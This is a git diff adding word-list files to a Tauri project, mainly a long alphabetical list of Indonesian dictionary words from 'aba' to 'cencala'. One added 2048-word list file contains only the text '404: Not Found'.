+jets
+qui
+intl
+cz
+yarn
+knit
+mug
+hl
+ob
+pike
+ids
+hugo
+gzip
+ctrl
+bent
+laos
diff --git a/src-tauri/wordlists/id-2048.txt b/src-tauri/wordlists/id-2048.txt
new file mode 100644
index 0000000..1becba2
--- /dev/null
+++ b/src-tauri/wordlists/id-2048.txt
@@ -0,0 +1 @@
+404: Not Found
\ No newline at end of file
diff --git a/src-tauri/wordlists/id-kbbi.lst b/src-tauri/wordlists/id-kbbi.lst
new file mode 100644
index 0000000..a860fb7
--- /dev/null
+++ b/src-tauri/wordlists/id-kbbi.lst
@@ -0,0 +1,18313 @@
+aba
+abad
+abadi
+abah
+abai
+abakus
+abal
+abang
+abc
+abdi
+abjad
+abnormal
+abnormalitas
+abolisi
+aborsi
+abortus
+abrasi
+abreviasi
+abrik
+absah
+absen
+absensi
+abses
+absolut
+absorpsi
+abstrak
+abu
+abuh
+abuhan
+abuk
+acak
+acakan
+acap
+acara
+aci
+acuan
+acuh
+ada
+adab
+adagium
+adakalanya
+adalah
+adaptasi
+adapun
+adat
+adegan
+adem
+adi
+adibintang
+adicita
+adidaya
+adik
+adikara
+adikarya
+adikuasa
+adil
+adiluhung
+adimarga
+adipati
+adiraja
+adiratna
+adisiswa
+aditokoh
+adiwangsa
+adiwarna
+adjektiva
+administrasi
+administrator
+adolesens
+adonan
+adres
+adu
+aduan
+aduhai
+aduk
+adukan
+advokasi
+afair
+afdal
+afektif
+afiat
+afiksasi
+afiliasi
+afirmasi
+agak
+agakan
+agaknya
+agama
+agar
+agas
+agen
+agenda
+agihkan
+agitasi
+agitator
+agraria
+agregasi
+agregat
+agresi
+agresif
+agresor
+agun
+agunan
+agung
+agungkan
+ahad
+ahli
+aib
+air
+ajaib
+ajak
+ajakan
+ajal
+ajang
+ajar
+ajaran
+ajuan
+ajudan
+ajukan
+akad
+akademi
+akal
+akalan
+akan
+akar
+akbar
+akhir
+akhirat
+akhirnya
+akhirulkalam
+akhlak
+akibat
+akibatnya
+akidah
+akil
+akomodasi
+akrab
+akreditasi
+akronim
+aksara
+aksen
+aksentuasi
+akseptor
+akses
+aksesori
+aksi
+akta
+aktif
+aktivis
+aktivitas
+aktor
+aktual
+aktualitas
+aku
+akuades
+akuisisi
+akumulasi
+akur
+akurasi
+akurat
+akut
+ala
+alam
+alamat
+alami
+alang
+alangkah
+alarm
+alas
+alasan
+alat
+albino
+alegori
+alegoris
+aleman
+alfabet
+algojo
+alhasil
+aliansi
+alias
+alibi
+alienasi
+alif
+alih
+alik
+alim
+alinea
+aliran
+alit
+alkisah
+allah
+almanak
+almarhum
+alokasi
+alopesia
+alot
+alpa
+alternasi
+alternatif
+alu
+alumnus
+alun
+alunan
+alur
+aluran
+alwah
+amal
+amalan
+aman
+amanah
+amanat
+amandel
+amarah
+amat
+amatan
+ambah
+ambai
+ambaikan
+ambal
+ambalan
+ambang
+ambasador
+ambeien
+ambekan
+amben
+ambet
+ambigu
+ambiguitas
+ambil
+ambilan
+ambing
+ambisi
+ambivalen
+amblas
+ambles
+ambrol
+ambruk
+ambung
+amfibi
+amis
+amoral
+ampai
+ampaian
+ampas
+ampela
+ampelas
+amplop
+ampuh
+ampun
+ampunan
+amtenar
+amuk
+amukan
+amunisi
+an
+anai
+anak
+anakan
+analisis
+analitis
+analogi
+anarki
+anarkis
+anasir
+ancaman
+ancang
+ancangan
+ancar
+ancol
+anda
+andai
+andaikan
+andal
+andalan
+andan
+andeng
+andil
+andong
+aneh
+aneka
+anekdot
+aneksasi
+angan
+angankan
+anggap
+anggapan
+anggar
+anggaran
+anggit
+anggota
+angguk
+anggun
+anggut
+angin
+anginan
+anginkan
+angka
+angkara
+angkasa
+angkasawan
+angkat
+angkatan
+angker
+angket
+angkin
+angkuh
+angkup
+angkutan
+anglo
+anglung
+angon
+angsur
+angsuran
+ani
+aniaya
+animo
+anja
+anjakan
+anjangsana
+anjing
+anjung
+anjungan
+anjur
+anjuran
+anom
+anomali
+anotasi
+antagonis
+antagonisme
+antagonistis
+antara
+antariksawan
+antek
+anteng
+anteseden
+antik
+anting
+antipati
+antiseptik
+antitesis
+antologi
+antonim
+antre
+antusias
+anu
+anugerah
+anus
+anuswara
+anutan
+anyam
+anyaman
+anyelir
+anyep
+anyih
+anyir
+apa
+apabila
+apalagi
+aparat
+aparatus
+apartemen
+apatis
+apel
+apendiks
+apes
+api
+apik
+apit
+apitan
+apkir
+apkiran
+aplaus
+aplikasi
+apologi
+apotek
+apresiasi
+apung
+apungkan
+arah
+arahan
+arai
+arakan
+aral
+aram
+arang
+aransemen
+aras
+arbitrer
+arca
+ardi
+area
+arek
+aren
+arena
+arestasi
+argentum
+argumen
+ari
+arif
+arik
+aristrokat
+aristrokratis
+arit
+arkais
+arketipe
+armada
+arogan
+aroma
+arsenikum
+arsitek
+arsitektur
+arteri
+arti
+artian
+artifisial
+artikel
+artikulasi
+artis
+artistik
+arus
+arwah
+as
+asa
+asabat
+asah
+asal
+asam
+asan
+asap
+asas
+asasi
+asbut
+asese
+aset
+asgar
+asih
+asimilasi
+asin
+asing
+asketisme
+asli
+asma
+asmara
+asosiasi
+asosiatif
+aspal
+asparagus
+aspek
+aspiran
+aspirasi
+asrama
+asri
+astaga
+astrolog
+astrologi
+astronaut
+astronomi
+asuhan
+asumsi
+asusila
+asyik
+atak
+atap
+atar
+atas
+atasan
+atau
+ateis
+atensi
+atik
+atlas
+atlet
+atma
+atmosfer
+atom
+atraksi
+atraktif
+atribut
+atrium
+aturan
+auditor
+aula
+aulia
+aur
+aurat
+aurum
+aus
+autokrasi
+autokrat
+aviator
+avontur
+avonturir
+awak
+awal
+awalan
+awam
+awan
+awang
+awas
+awet
+awi
+awut
+awutan
+ayah
+ayakan
+ayal
+ayam
+ayan
+ayat
+ayem
+ayo
+ayu
+ayun
+ayunan
+azab
+azan
+azimat
+aziz
+bab
+babad
+babak
+babat
+babi
+bablas
+babon
+babut
+baca
+bacaan
+bacin
+bacok
+bacokan
+bacot
+badai
+badak
+badal
+badan
+badang
+badaniah
+badminton
+badung
+badut
+bagai
+bagaikan
+bagaimana
+bagak
+bagan
+bagas
+bagasi
+bagi
+bagian
+bagikan
+baginda
+bagong
+bagus
+bah
+bahadur
+bahaduri
+bahagia
+bahak
+baham
+bahan
+bahana
+bahang
+bahari
+bahas
+bahasa
+bahasan
+bahasawan
+bahaya
+bahenol
+bahkan
+bahu
+bahwasanya
+baik
+baikan
+baiklah
+bait
+bajak
+bajing
+baju
+bajul
+bak
+baka
+bakal
+bakat
+baki
+bakiak
+bakir
+bakteri
+bakti
+baku
+bakul
+bal
+bala
+balah
+balahan
+balai
+balairung
+balak
+balam
+balas
+balasan
+balau
+bali
+balig
+baliho
+balik
+balikkan
+baling
+balkon
+balok
+balon
+balun
+balung
+balur
+balut
+balutan
+bambu
+ban
+bancet
+banci
+bancuh
+bancuhan
+bandar
+bandasrayan
+bandel
+bandela
+bandingan
+bandit
+bando
+bandot
+bandrek
+bandul
+bang
+bangas
+bangat
+bangbung
+banget
+bangga
+bangir
+bangka
+bangkahulu
+bangkai
+bangket
+bangkir
+bangkit
+bangkot
+bangkrut
+bangku
+bangsa
+bangsal
+bangsat
+bangsawan
+bangun
+bangunan
+bani
+banjar
+banjaran
+banjir
+bankir
+bantahan
+bantal
+bantalan
+banteng
+banter
+banting
+bantu
+bantuan
+banyak
+banyaknya
+banyol
+banyolan
+bapak
+bapang
+baplang
+bar
+bara
+barak
+baran
+barang
+barangkali
+barangsiapa
+barbel
+baret
+barikade
+baring
+baris
+barisan
+barometer
+barter
+baru
+baruh
+barut
+barzakh
+basah
+basau
+basi
+basil
+basis
+basket
+baskom
+basuh
+bata
+batal
+batalion
+batang
+batangan
+batara
+batari
+batas
+batasan
+baterai
+batih
+batik
+batil
+batin
+batiniah
+batok
+batu
+batuk
+bau
+baur
+bauran
+bausastra
+bawa
+bawaan
+bawah
+bawahan
+bawang
+bawasir
+bawel
+baya
+bayan
+bayang
+bayangan
+bayangi
+bayangkara
+bayar
+bayaran
+bayi
+bayian
+bayonet
+bayu
+bayung
+bazar
+bea
+beasiswa
+bebal
+beban
+bebas
+bebat
+bebek
+bebenah
+beber
+beberapa
+bebodoran
+bebotoh
+bebuyutan
+becak
+becek
+becus
+beda
+bedah
+bedak
+bedakan
+bedel
+bedeng
+bederma
+bedil
+bedol
+beduk
+begah
+begal
+begawan
+begini
+begitu
+bego
+begu
+begundal
+beha
+bejana
+bejat
+bekal
+bekas
+beken
+beker
+bekerja
+bekerlapan
+bekernyut
+bekicot
+beku
+bekuk
+bel
+bela
+belacan
+belah
+belahan
+belai
+belaian
+belajar
+belaka
+belakang
+belakangan
+belalai
+belalak
+belam
+belanda
+belandong
+belandung
+belang
+belanga
+belangkas
+belangkin
+belanja
+belantara
+belas
+belasting
+belasungkawa
+belat
+belati
+belatik
+belatung
+belau
+belebas
+beleid
+belek
+belendung
+belenggu
+belenting
+belerang
+beleter
+beli
+belia
+belian
+beliau
+belibis
+beligo
+beling
+belingsatan
+belinjo
+belit
+belitan
+beliung
+belok
+belokan
+belongsong
+beludak
+beluk
+belukar
+beluku
+belukut
+belulang
+beluluk
+belunjur
+belur
+belus
+bembam
+bena
+benak
+benalu
+benang
+benar
+benara
+bencah
+bencana
+benci
+benda
+bendahara
+bendera
+bendi
+bendo
+bendung
+bendungan
+bengap
+bengawan
+bengek
+benggol
+bengis
+bengkak
+bengkarak
+bengkarung
+bengkel
+bengkok
+bengkuang
+bengkudu
+bengkunang
+bengkung
+bengong
+bengot
+benguk
+benih
+bening
+bensin
+bentak
+bentakan
+bentala
+bentang
+bentangan
+benteng
+bentrok
+bentrokan
+bentuk
+bentukan
+bentul
+bentur
+benturan
+benua
+benyek
+benyot
+beo
+bepergian
+berabjad
+berabonemen
+beracun
+berada
+beradab
+beradai
+beradak
+beradat
+beradu
+beraduk
+beragama
+beragan
+berahi
+berai
+berair
+beraja
+berak
+berakad
+berakal
+berakar
+berakhir
+berakhlak
+berakibat
+beraksi
+beralamat
+beralas
+beralasan
+beralaskan
+beralih
+beraliran
+beralur
+beramal
+beramanat
+berambang
+berambisi
+berambut
+berampak
+beranak
+beranda
+berandal
+berandalan
+beraneka
+berang
+berangan
+beranggapan
+beranggar
+beranggut
+berangin
+berangkaian
+berangkat
+berangsang
+berangsangan
+berangus
+berani
+beranjak
+beranjangsana
+beranjung
+berantakan
+berantam
+berantara
+berantas
+berantem
+beranting
+berantuk
+berantukan
+beranyam
+berapat
+berapi
+berapit
+berarak
+berarakan
+berarti
+beras
+berasal
+berasap
+berasas
+berasaskan
+berasimilasi
+berasing
+berasingan
+berasmara
+berasosiasi
+berat
+beratap
+beratapkan
+beratur
+beraturan
+berawal
+berawan
+berayun
+berbagai
+berbahagia
+berbahana
+berbahasa
+berbahasan
+berbahaya
+berbaik
+berbaikan
+berbakat
+berbakti
+berbalah
+berbalas
+berbalasan
+berbalik
+berbangga
+berbangsa
+berbantah
+berbareng
+berbaring
+berbaris
+berbatas
+berbau
+berbaur
+berbawaan
+berbeda
+berbelanja
+berbelasungkawa
+berbelit
+berbelitan
+berbelulang
+berbenah
+berbenam
+berbencah
+berbenda
+berbentar
+berbentuk
+berbenturan
+berberaian
+berbetulan
+berbicara
+berbilang
+berbilur
+berbimbingan
+berbingkai
+berbisa
+berbobot
+berbohong
+berbomoh
+berbonggol
+berbuah
+berbuai
+berbuat
+berbudaya
+berbudi
+berbuih
+berbunga
+berbungkus
+berbuntang
+berbuntut
+berbunyi
+berburai
+berburu
+berburuk
+berbutir
+bercabang
+bercabul
+bercacah
+bercadar
+bercagak
+bercahaya
+bercak
+bercakak
+bercakap
+bercakrawala
+bercalar
+bercalit
+bercampur
+bercampuran
+bercanda
+bercaran
+bercat
+berceceran
+bercekah
+bercekak
+bercekakakan
+bercekcok
+bercekit
+bercekung
+bercelah
+bercelak
+bercelatuk
+berceloteh
+bercempera
+bercendawan
+bercengkerama
+bercengkung
+bercerai
+berceramah
+bercerancangan
+berceranggah
+bercerita
+bercermin
+bercintaan
+bercirikan
+berciuman
+bercokol
+bercorak
+bercucuran
+bercukur
+bercula
+bercumbuan
+bercura
+bercuti
+berdacin
+berdagang
+berdahak
+berdahan
+berdaki
+berdakwah
+berdalih
+berdalil
+berdamai
+berdamar
+berdampak
+berdampil
+berdampingan
+berdandan
+berdansa
+berdapat
+berdarah
+berdarmawisata
+berdasar
+berdasarkan
+berdatang
+berdaulat
+berdaya
+berdayung
+berdebar
+berdebat
+berdebit
+berdebu
+berdedak
+berdefile
+berdeging
+berdekap
+berdekapan
+berdekatan
+berdeklamasi
+berdeku
+berdelan
+berdempetan
+berdendang
+berdenging
+berdengung
+berdentam
+berdentang
+berdenting
+berdentum
+berdentur
+berdenyut
+berdepan
+berderai
+berderam
+berderet
+berdering
+berdesakan
+berdetak
+berdetik
+berdeting
+berdialek
+berdialog
+berdikari
+berdinas
+berdinding
+berdiplomasi
+berdiri
+berdiskusi
+berdoa
+berdomisili
+berdompol
+berdua
+berduaan
+berduel
+berduit
+berduka
+berdukacita
+berdukun
+berdulang
+berduri
+berdusta
+beredar
+beredel
+berekan
+berekspansi
+berenda
+berendam
+berendeng
+berengkau
+berengos
+berengsek
+berentetan
+bererotan
+beres
+berewok
+berfirman
+berfokus
+berfoto
+berfungsi
+berfusi
+bergabung
+bergaduh
+bergala
+bergambar
+berganda
+bergandengan
+berganti
+bergaris
+bergas
+bergaung
+bergaya
+bergayut
+bergayutan
+bergegas
+bergejolak
+bergelandang
+bergelayut
+bergelayutan
+bergelebar
+bergeletakan
+bergelimang
+bergelimpangan
+bergelombang
+bergelora
+bergelundungan
+bergelung
+bergelut
+bergema
+bergembira
+bergeming
+bergendak
+bergendang
+bergentayangan
+bergerak
+bergerayangan
+bergerigi
+bergerombol
+bergerugut
+bergesekan
+bergeser
+bergetar
+bergiat
+bergidik
+bergigi
+bergilir
+bergocoh
+bergolak
+bergolek
+bergolekan
+bergontok
+bergosip
+bergoyang
+bergradasi
+berguguran
+bergulat
+berguling
+bergulingan
+bergulir
+bergulung
+bergumam
+berguna
+berguncang
+bergunjing
+bergurah
+bergurau
+berguru
+berhad
+berhadapan
+berhajat
+berhak
+berhal
+berhala
+berhaluan
+berhampiran
+berhantam
+berhantaran
+berhantu
+berhanyutan
+berharap
+berharga
+berharta
+berhasil
+berhasrat
+berhemat
+berhembus
+berhenti
+berhias
+berhijrah
+berhikayat
+berhimpun
+berhingga
+berhitung
+berhubung
+berhubungan
+berhulu
+beri
+berias
+beribadat
+beribu
+beribukan
+berida
+berideologi
+beridip
+berikan
+berikhtiar
+berikrar
+beriktikad
+berikut
+berilmu
+berim
+beriman
+berimbang
+berimbas
+berimbuhan
+berimpitan
+beringat
+beringin
+beringsut
+berintegrasi
+berintrospeksi
+beripuh
+berirama
+beriring
+beriringan
+berisi
+berisik
+beristirahat
+berita
+beriwayat
+berjabatan
+berjaga
+berjajar
+berjajaran
+berjala
+berjalan
+berjalin
+berjalinan
+berjamu
+berjangat
+berjangkit
+berjanguk
+berjanji
+berjarak
+berjatuhan
+berjaya
+berjebah
+berjejak
+berjejal
+berjejas
+berjejer
+berjenjang
+berjingkat
+berjingkrak
+berjiwa
+berjobak
+berjoget
+berjolak
+berjongkok
+berjualan
+berjuang
+berjudi
+berjujai
+berjulai
+berjumpa
+berjumpalit
+berjungkir
+berjuntai
+berjuntaian
+berjupang
+berkabut
+berkaca
+berkacak
+berkacau
+berkah
+berkaitan
+berkala
+berkalang
+berkampaian
+berkamuflase
+berkanjang
+berkapang
+berkaparan
+berkarakter
+berkarat
+berkarut
+berkarya
+berkas
+berkasam
+berkasihan
+berkat
+berkata
+berkaum
+berkawal
+berkawan
+berkawanan
+berkawin
+berkeadaan
+berkeberatan
+berkebul
+berkebun
+berkecambah
+berkecamuk
+berkecimpung
+berkecumik
+berkedai
+berkedip
+berkedok
+berkedudukan
+berkehendak
+berkeinginan
+berkejap
+berkejaran
+berkekuatan
+berkelahi
+berkelakar
+berkelakuan
+berkelamin
+berkelana
+berkelanjutan
+berkelas
+berkeledar
+berkelejat
+berkelejatan
+berkelemban
+berkelepai
+berkeletah
+berkeliaran
+berkeliling
+berkelim
+berkelindan
+berkelintaran
+berkelit
+berkelok
+berkelompok
+berkeloyak
+berkeluarga
+berkeluk
+berkelumun
+berkeluyuran
+berkemampuan
+berkemandang
+berkembang
+berkemih
+berkemuh
+berkenaan
+berkenalan
+berkenan
+berkepala
+berkepanjangan
+berkepastian
+berkepentingan
+berkepribadian
+berkepul
+berkeputusan
+berkerabat
+berkeriau
+berkeriput
+berkerotak
+berkerubung
+berkerumuk
+berkerumun
+berkerunyuk
+berkerut
+berkesanggupan
+berkesempatan
+berkesinambungan
+berkesudahan
+berketentuan
+berketurunan
+berkewajiban
+berkeyakinan
+berkhalwat
+berkhasiat
+berkhayal
+berkhianat
+berkhotbah
+berkias
+berkibar
+berkiblat
+berkicau
+berkikikan
+berkilah
+berkilap
+berkilau
+berkilauan
+berkiprah
+berkisah
+berkisar
+berkitar
+berkocak
+berkolaborasi
+berkolusi
+berkompetensi
+berkomplot
+berkompromi
+berkongkalikong
+berkongsi
+berkonspirasi
+berkontemplasi
+berkorban
+berkreasi
+berkualitas
+berkuasa
+berkuat
+berkubang
+berkucur
+berkujut
+berkulai
+berkumandang
+berkumpul
+berkumur
+berkumut
+berkundang
+berkunjung
+berkurang
+berkurangan
+berkutat
+berkutik
+berlaba
+berlabel
+berlabuh
+berladang
+berlaga
+berlagak
+berlagu
+berlainan
+berlaku
+berlalu
+berlandaskan
+berlangganan
+berlanglang
+berlangsung
+berlanjut
+berlantas
+berlantasan
+berlapis
+berlarian
+berlatih
+berlawan
+berlawanan
+berlayar
+berlebih
+berlebihan
+berlelehan
+berlena
+berlendir
+berlenggang
+berlepas
+berleret
+berlezat
+berlian
+berlibat
+berlibur
+berlilit
+berlinang
+berlindung
+berlingkar
+berlipat
+berlomba
+berlompatan
+berlonggok
+berlontaran
+berlubang
+berlumang
+berlumpur
+berlumuran
+berlunjur
+berlutut
+bermadah
+bermadu
+bermain
+bermakna
+bermakrifat
+bermaksud
+bermalam
+bermamak
+bermanai
+bermandi
+bermandikan
+bermanfaat
+bermanja
+bermarkas
+bermartabat
+bermasalah
+bermasturbasi
+bermazhab
+bermeditasi
+bermesra
+bermesraan
+bermetamorfosis
+bermigrasi
+bermimpi
+berminat
+bermitra
+bermoral
+bermufakat
+bermuka
+bermukah
+bermula
+bermuram
+bermuslihat
+bermusuhan
+bermusyawarah
+bermutu
+bernada
+bernafsu
+bernalam
+bernalar
+bernama
+bernanah
+bernapas
+bernas
+bernaung
+bernegosiasi
+berniat
+bernilai
+bernoda
+bernuansa
+bernyala
+bernyanyi
+bernyawa
+beroda
+berok
+berolah
+berolak
+berombak
+berombongan
+berona
+berongga
+berontak
+beroperasi
+berorientasi
+berpacangan
+berpacaran
+berpacu
+berpadanan
+berpadu
+berpagu
+berpagut
+berpagutan
+berpaham
+berpahat
+berpaling
+berpalis
+berpamor
+berpanas
+berpancaran
+berpandangan
+berpangkal
+berpangkalan
+berpangkat
+berpangku
+berpangsa
+berpantang
+berpantun
+berpapakan
+berpapasan
+berparade
+berparak
+berparas
+berpartisipasi
+berpartner
+berpasangan
+berpatokan
+berpatroli
+berpatutan
+berpaut
+berpautan
+berpawai
+berpawang
+berpedang
+berpedoman
+berpegang
+berpegangan
+berpelantingan
+berpelesir
+berpelin
+berpelita
+berpeluang
+berpeluk
+berpembawaan
+berpencar
+berpencaran
+berpendapat
+berpendar
+berpendidikan
+berpendirian
+berpengalaman
+berpengaruh
+berpengetahuan
+berpenggawa
+berpengharapan
+berperahu
+berperam
+berperan
+berperang
+berperangai
+berperdu
+berperhatian
+berperi
+berperingkat
+berpesan
+berpesiar
+berpesta
+berpetaruh
+berpetir
+berpetua
+berpihak
+berpijak
+berpijar
+berpikir
+berpikiran
+berpilin
+berpindah
+berpingit
+berpinset
+berpintal
+berpipa
+berpisah
+berpiuh
+berpola
+berpolemik
+berpose
+berpotongan
+berprasangka
+berpretensi
+berprinsip
+berprofesi
+berproses
+berpuaka
+berpuasa
+berpulang
+berpulas
+berpumpun
+berpunca
+berpunya
+berpurdah
+berpusar
+berpusing
+berputar
+berputik
+berputing
+berputra
+berputusan
+berqalam
+bersabar
+bersabda
+bersabung
+bersagang
+bersahabat
+bersahaja
+bersahut
+bersahutan
+bersaing
+bersaksi
+bersalam
+bersalin
+bersalut
+bersama
+bersamaan
+bersambang
+bersambut
+bersampingan
+bersampul
+bersampur
+bersandar
+bersanding
+bersandiwara
+bersangai
+bersanggit
+bersanggul
+bersangkak
+bersangkar
+bersangkut
+bersangkutan
+bersantai
+bersantap
+bersantun
+bersapaan
+bersaput
+bersarak
+bersarang
+bersarung
+bersatu
+bersaudara
+bersauh
+bersaur
+bersawah
+bersawala
+bersebadan
+bersebar
+bersebaran
+bersebelahan
+berseberangan
+bersedekah
+bersedia
+bersedih
+bersegeh
+bersegera
+bersegi
+bersejarah
+bersekat
+bersekolah
+bersekongkol
+bersekutu
+bersela
+berselang
+berselaput
+berselera
+berselesa
+berselimut
+berseling
+berselingkuh
+berselisih
+berseloroh
+berselubung
+bersemangat
+bersemarak
+bersemayam
+bersembahyang
+bersembulan
+bersemburan
+bersemi
+bersempadan
+bersemuka
+bersenam
+bersenandung
+bersendi
+bersendikan
+bersendu
+bersengat
+bersenggol
+bersenggolan
+bersengkarut
+bersengkelit
+bersengketa
+berseni
+bersenjata
+bersentuh
+bersentuhan
+bersepadan
+bersepakat
+bersepuh
+berserabut
+berserah
+berserakan
+berserdawa
+berseri
+berserikat
+berseru
+bersesuaian
+berseteru
+bersetuju
+bersiasat
+bersibak
+bersicepat
+bersidang
+bersifat
+bersigap
+bersih
+bersikap
+bersikeras
+bersikukuh
+bersilaju
+bersilang
+bersilat
+bersilih
+bersimbur
+bersimpan
+bersimpang
+bersimpati
+bersin
+bersinambung
+bersinar
+bersinggung
+bersinggungan
+bersiram
+bersiraman
+bersirkulasi
+bersisa
+bersisi
+bersisian
+bersistem
+bersitegang
+bersiteguh
+bersoal
+bersombong
+bersongsong
+bersorak
+berspekulasi
+berstatus
+berstruktur
+bersua
+bersuara
+bersuatu
+bersuci
+bersuit
+bersukacita
+bersukaria
+bersulam
+bersulih
+bersuluk
+bersumber
+bersumpah
+bersungkit
+bersungkup
+bersurat
+bersurih
+bersusila
+bersusun
+bersyair
+bersyarah
+bersyukur
+bertabiat
+bertabir
+bertabrakan
+bertabur
+bertaburan
+bertaburka
+bertafakur
+bertagan
+bertagar
+bertahak
+bertahan
+bertahap
+bertahuan
+bertaji
+bertajuk
+bertakhta
+bertaki
+bertakik
+bertakuk
+bertalaran
+bertali
+bertalian
+bertamadun
+bertamasya
+bertambah
+bertambat
+bertambatan
+bertambun
+bertampang
+bertampar
+bertamu
+bertanah
+bertanda
+bertandang
+bertanding
+bertandu
+bertanduk
+bertangas
+bertangga
+bertani
+bertanya
+bertapa
+bertapak
+bertapakkan
+bertaraf
+bertarak
+bertarikh
+bertaring
+bertaruh
+bertarung
+bertatapan
+bertaut
+bertautan
+bertebaran
+bertedengan
+berteduh
+bertekad
+bertekak
+bertekan
+bertekuk
+bertekun
+bertelanjang
+bertelur
+berteman
+bertembuk
+bertembung
+bertempat
+bertempik
+bertempoh
+bertempur
+bertemu
+bertenaga
+bertenggang
+bertengkar
+bertengkel
+bertengking
+bertentangan
+bertenun
+bertepatan
+bertepi
+bertepuk
+berteraskan
+berterawang
+berteriak
+berterima
+bertetesan
+bertikai
+bertimbal
+bertimbalan
+bertimbun
+bertindak
+bertindan
+bertingkah
+bertingkat
+bertinju
+bertirai
+bertirakat
+bertitah
+bertiup
+bertolak
+bertopang
+bertopeng
+bertransaksi
+bertransformasi
+bertuah
+bertubrukan
+bertubuh
+bertudung
+bertugas
+bertujuan
+bertukar
+bertukaran
+bertulang
+bertulis
+bertumbuh
+bertumbuk
+bertumbukan
+bertumpu
+bertunangan
+bertunas
+bertunda
+bertunggu
+berturutan
+bertutur
+beruang
+berubah
+beruban
+berucap
+berudu
+berujar
+berujud
+berujul
+berukir
+berukuran
+berulah
+berulang
+berulat
+berumah
+berumbai
+berumbaian
+berumpuk
+berumpun
+berumur
+berunding
+berunggun
+berungkuran
+beruntai
+beruntaian
+beruntun
+beruntung
+beruntus
+beruntutan
+berupa
+berupaya
+berurai
+berurat
+berurusan
+berurut
+berurutan
+berusaha
+berusia
+berusul
+berutas
+bervakansi
+bervitamin
+berwajah
+berwajib
+berwarna
+berwasiat
+berwaspada
+berwatak
+berwawancara
+berwenang
+berwibawa
+berwisata
+berwudu
+berwujud
+berziarah
+berzikir
+berzina
+besar
+besaran
+besarkan
+beserta
+beset
+besi
+besing
+besok
+bestel
+bestelan
+bet
+betah
+betak
+betapa
+betara
+betatas
+beterbangan
+beterjunan
+beternak
+beti
+betik
+betina
+beton
+betul
+betulan
+betung
+bhayangkara
+biadab
+biadi
+biak
+biang
+bianglala
+biaperi
+biar
+biara
+biarawan
+biarawati
+biarpun
+bias
+biasa
+biasanya
+biawak
+biaya
+bibel
+bibi
+bibir
+bibit
+bibliografi
+bibliotek
+bicara
+bicokok
+bida
+bidadari
+bidah
+bidak
+bidal
+bidan
+bidang
+bidara
+bidasan
+biduan
+biduanda
+bija
+bijak
+bijaksana
+bijan
+biji
+bijih
+biksu
+biku
+bila
+bilal
+bilamana
+bilangan
+bilas
+bilasan
+biliar
+bilik
+bilingual
+bilur
+bilyet
+bimbang
+bimbing
+bimbingan
+binaan
+binal
+binar
+binasa
+binatang
+binatu
+bincang
+bindam
+bineka
+bingkah
+bingkai
+bingkatak
+bingkis
+bingkisan
+bingung
+bini
+bintang
+bintik
+bintil
+bintit
+biodata
+biografi
+bioskop
+birai
+birama
+biri
+birit
+biro
+birokrat
+biru
+bisa
+bisai
+biseksual
+bisik
+bisikan
+bising
+bisnis
+bisu
+bisul
+bivak
+blakan
+blangko
+blaster
+blok
+blokade
+blong
+blus
+bobol
+bobot
+bobrok
+bocah
+bocor
+bodi
+bodoh
+bodong
+boga
+bogel
+bogor
+bohong
+bohongan
+bokca
+bokong
+bokser
+bola
+boleh
+bolehnya
+boling
+bolong
+bolongan
+bolsak
+bombastis
+bomoh
+bon
+bonafide
+boncel
+bonceng
+boncengan
+bondong
+boneka
+bongak
+bonggol
+bongkah
+bongkak
+bongkar
+bongkot
+bongsor
+bontot
+bonus
+bonyok
+bopeng
+bor
+bordir
+bordiran
+borgol
+borok
+borong
+borongan
+boros
+bos
+bosan
+botak
+botor
+brata
+brengsek
+brevet
+brigade
+briket
+brilian
+broker
+bromocorah
+brosur
+brutal
+buah
+buai
+buaian
+bual
+bualan
+buana
+buang
+buangan
+buas
+buat
+buatan
+buaya
+bubar
+bubuk
+bubung
+bubut
+bubutan
+budak
+budaya
+budayawan
+budek
+budi
+budiman
+buduk
+bufet
+bugar
+bugil
+buhuk
+buhul
+buih
+bujal
+bujang
+bujangan
+bujuk
+bujukan
+bujur
+buka
+bukan
+bukit
+bukti
+buku
+bulai
+bulan
+bulanan
+bulat
+bule
+buletin
+bulu
+buluh
+bulus
+bumbu
+bumbung
+bumi
+bumiputra
+bunbunan
+buncah
+buncit
+bunda
+bundar
+bundaran
+bundel
+bunga
+bungalo
+bungkal
+bungkam
+bungkuk
+bungkus
+bungkusan
+bungsil
+bungsu
+buntal
+buntel
+buntet
+bunting
+buntingan
+buntu
+buntung
+buntut
+bunuh
+bunyi
+bupati
+buram
+buras
+burik
+burit
+buron
+bursa
+buru
+buruan
+buruh
+buruk
+burukkan
+burung
+burut
+busana
+busat
+busi
+busuk
+busung
+busur
+busut
+buta
+butek
+butir
+butuh
+butut
+buya
+buyar
+buyung
+buyut
+cabai
+cabang
+cabik
+cabikan
+cabir
+cabuk
+cabul
+cacah
+cacak
+cacar
+cacat
+cacatan
+cacauan
+caci
+cacian
+cacing
+cacingan
+cadang
+cadangan
+cadar
+cadas
+cadel
+cadik
+cagak
+cagar
+cagaran
+caguh
+cahar
+cahaya
+caing
+cair
+cairan
+cakak
+cakap
+cakar
+cakaran
+cakiak
+cakram
+cakrawala
+cakupan
+cala
+calak
+calang
+calar
+caling
+calit
+calo
+calon
+caluk
+cam
+camar
+cambang
+cambuk
+cambung
+camca
+camilan
+campak
+campin
+camping
+campung
+campur
+campuran
+canai
+canang
+cancang
+canda
+candit
+candra
+candrasa
+candu
+cangak
+cangam
+cangga
+canggaan
+canggih
+canggu
+canggung
+cangkat
+cangkel
+cangkih
+cangklong
+cangkrang
+cangkriman
+cangkul
+cante
+cantel
+cantengan
+cantik
+cantolan
+cantrik
+cap
+capah
+capak
+capek
+capik
+caping
+capit
+caplak
+capuk
+capung
+cara
+carang
+cari
+carik
+carut
+cat
+catak
+catat
+catatan
+catu
+catur
+catut
+caung
+cawan
+cawat
+cawis
+cebakan
+cebikas
+cebol
+cebong
+cebur
+ceceran
+cecunguk
+cedera
+cedok
+cegak
+cegar
+cegukan
+cekah
+cekak
+cekal
+cekang
+cekatan
+cekel
+ceker
+ceki
+cekibar
+cekikikan
+ceking
+cekung
+cela
+celaan
+celah
+celak
+celaka
+celana
+celangak
+celangap
+celedok
+celek
+celemotan
+celeng
+celengan
+celengkok
+celentang
+celetukan
+celih
+celik
+celinguk
+celingukan
+celomes
+celomok
+celoteh
+celum
+celung
+celus
+cema
+cemar
+cemara
+cemas
+cemberut
+cembul
+cembung
+cemburu
+cemeh
+cemek
+cemer
+cemerlang
+cemeti
+cemong
+cemooh
+cempala
+cempe
+cempek
+cempiang
+cemping
+cemplang
+cempuling
+cemuas
+cena
+cenangau
+cenangga
+cenangkas
+cenayang
+cencala
